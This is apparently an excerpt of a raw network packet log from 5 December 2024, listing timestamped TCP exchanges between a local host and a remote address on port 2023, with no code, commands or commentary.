                                                                                                                  Dec 5, 2024 10:46:59.502614975 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.502743006 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.502753019 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.807368994 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:59.859790087 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:00.797697067 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:00.917536020 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:00.917632103 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:01.037441969 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:01.322896957 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:01.323204994 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:01.324243069 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:01.326299906 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:01.326404095 CET497482023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:01.446185112 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:01.446309090 CET20234974845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:06.328977108 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:06.448971987 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:06.449121952 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:06.449207067 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:06.568933010 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:07.696769953 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:07.696788073 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:07.696911097 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:07.708069086 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:07.827833891 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:08.114856005 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:08.115240097 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:08.235064030 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:08.575793028 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:08.578485012 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:08.698354959 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:08.698432922 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:08.818418026 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.103732109 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.107857943 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.227752924 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.227826118 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.347753048 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.633215904 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.637679100 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.637742996 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.637757063 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.637759924 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.637815952 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.637834072 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.646043062 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.646115065 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.646133900 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.653551102 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.653621912 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.653688908 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.661899090 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.661950111 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.661981106 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.666877031 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.666939020 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.667007923 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.675321102 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.675347090 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.675403118 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.719192982 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.757616997 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.812895060 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.829715967 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.829761028 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.829812050 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.833970070 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.834027052 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.834089041 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.949561119 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.949583054 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:09.949738026 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:09.953706980 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:10.000420094 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.185316086 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.305505991 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.307003975 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.427911997 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.715883017 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.717628956 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.717708111 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.717710972 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.724111080 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.724178076 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.725323915 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.725415945 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.725466967 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.733338118 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.733480930 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.733534098 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.738696098 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.738746881 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.738845110 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.746772051 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.746922016 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.746972084 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.754949093 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.755171061 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.755228043 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.762988091 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.763114929 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.763169050 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.771212101 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.771455050 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.771522045 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.779252052 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.779438019 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.779483080 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.787359953 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.787442923 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.787513018 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.795609951 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.795710087 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.795764923 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.803585052 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.803757906 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.803811073 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.811685085 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.811800003 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.811853886 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.819772005 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.819828033 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.819904089 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.827888012 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.827960014 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.828032970 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.835942984 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.836097956 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.836163998 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.844072104 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.891083002 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.909565926 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.909683943 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.909740925 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.912750959 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.912822962 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.912870884 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.918732882 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.920950890 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.921010971 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.921081066 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.927247047 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.927310944 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.927335024 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.933252096 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.933340073 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.933423996 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.939050913 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.939065933 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.939127922 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.944628000 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.944653034 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.944700956 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.949969053 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.950042009 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.950129986 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.955425024 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.955439091 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.955524921 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.960649967 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.960715055 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.960758924 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.965708971 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.965751886 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.965768099 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.970794916 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.970870018 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.970885992 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.975883961 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.975955009 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.976083040 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.980987072 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.981048107 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.981102943 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.986054897 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.986124039 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.986176968 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.991226912 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.991293907 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.991298914 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.996202946 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:12.996268034 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:12.996323109 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.001491070 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.001564026 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.001578093 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.006375074 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.006442070 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.006510973 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.011466980 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.011531115 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.011554003 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.016614914 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.016679049 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.016721964 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.021640062 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.021682978 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.021712065 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.062921047 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.242707014 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.362591028 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.362659931 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.484508038 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.774740934 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.775187969 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.775238991 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.775320053 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.777510881 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.777563095 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.778114080 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.778245926 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.778285027 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.780828953 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.780937910 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.780975103 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.782674074 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.782787085 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.782828093 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.785404921 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.785518885 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.785562992 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.788177013 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.788306952 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.788352966 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.791014910 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.791090965 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.791135073 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.793730021 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.793792963 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.793833017 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.796603918 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.796658039 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.796691895 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.799355984 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.799598932 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.799650908 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.801996946 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.802128077 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.802171946 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.804785013 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.804858923 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.804896116 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.807554007 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.807660103 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.807698011 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.810340881 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.810460091 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.810492039 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.813075066 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.813195944 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.813239098 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.815809965 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.815917969 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.815958023 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.818572044 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.818706989 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.818742037 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.821329117 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.821399927 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.821439981 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.824132919 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.824253082 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.824290991 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.826953888 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.827050924 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.827092886 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.829636097 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.829709053 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.829749107 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.832554102 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.832820892 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.832863092 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.835326910 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.835422993 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.835463047 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.838078022 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.838263035 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.838299036 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.840703964 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.840842009 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.840883970 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.843470097 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.843661070 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.843704939 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.846291065 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.846374035 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.846416950 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.849194050 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.849286079 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.849327087 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.851897001 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.852008104 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.852047920 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.854625940 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.854733944 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.854775906 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.857328892 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.857682943 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.857722044 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.860146999 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.860202074 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.860240936 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.862879992 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.862955093 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.863001108 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.865650892 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.865737915 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.865780115 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.868315935 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.868437052 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.868479967 CET497782023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:47:13.871171951 CET20234977845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:47:13.871295929 CET20234977845.149.241.141192.168.2.4
